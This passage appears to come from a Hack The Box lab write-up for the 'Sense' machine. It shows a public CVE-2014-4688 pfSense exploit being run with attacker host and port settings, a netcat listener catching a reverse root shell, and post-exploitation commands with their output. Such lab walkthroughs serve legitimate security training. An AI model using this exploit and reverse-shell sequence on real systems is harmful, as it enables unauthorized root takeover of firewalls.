Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/sense]
└─$ python3 CVE-2014-4688.py --rhost $IP --lhost 10.10.14.5 --lport 9999 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completedExecuting the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/sense]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 13540
sh: can't access tty; job control turned off
# whoami
root
# hostname
pfSense.localdomain
# ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>
ether 00:50:56:b9:b2:f6
inet 10.10.10.60 netmask 0xffffff00 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:b2f6%em0 prefixlen 64 scopeid 0x1
nd6 options=1<PERFORMNUD>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
plip0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> metric 0 mtu 1500
enc0: flags=0<> metric 0 mtu 1536
pfsync0: flags=0<> metric 0 mtu 1460
syncpeer: 224.0.0.240 maxupd: 128 syncok: 1
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=3<RXCSUM,TXCSUM>
inet 127.0.0.1 netmask 0xff000000
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
nd6 options=3<PERFORMNUD,ACCEPT_RTADV>
pflog0: flags=100<PROMISC> metric 0 mtu 33144
Initial Foothold established as root via exploiting CVE-2014-4688 on the target web application
System Level Compromise